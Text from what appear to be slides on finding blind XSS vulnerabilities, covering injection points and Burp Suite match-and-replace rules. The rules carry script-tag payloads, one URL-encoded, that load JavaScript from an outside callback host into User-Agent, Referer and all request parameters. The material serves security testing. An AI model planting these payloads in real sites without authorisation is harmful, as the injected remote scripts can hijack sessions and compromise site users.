3. What is Blind Xss ?
• In general, the xss payload is not
directly reflected in the web
application, nor is the visual
surface of the vulnerable
endpoint publicly visible.
4. How blind xss works?
• They occur when the attacker
input is saved by the web
server and executed as a
malicious script in another part
of the application or in another
application.
- acunetix
6. Where to look for Bxss ?
Everywhere
User-agent
Url Parameter
Referrer
Chat applications
Contact/feedback
forms
7. Some technics to find bxss
• Match and Replace
burp suite
• Regex:
^User-Agent:.*$
^Referer:.*$
• Replace:
User-Agent: test"><script
src=https://your.bxss.in></script>
8. AutoRepeater –burp
• Match and Replace
burp suite
• Request param
value:
Regex: .*
• Replace:
blindxss%22%3E%3Cscript%20src=https
://test.bxss.in%3E%3C/script%3E
https://portswigger.net/bappstore/f89f2837c22c4ab4b772f31522647ed8
9. Replacement of Xsshunter
• Xss hunter was a great
service to manage the blind
xss pages and notifications,
but unfortunately, there is no
longer available.
Replacement:
https://bxsshunter.com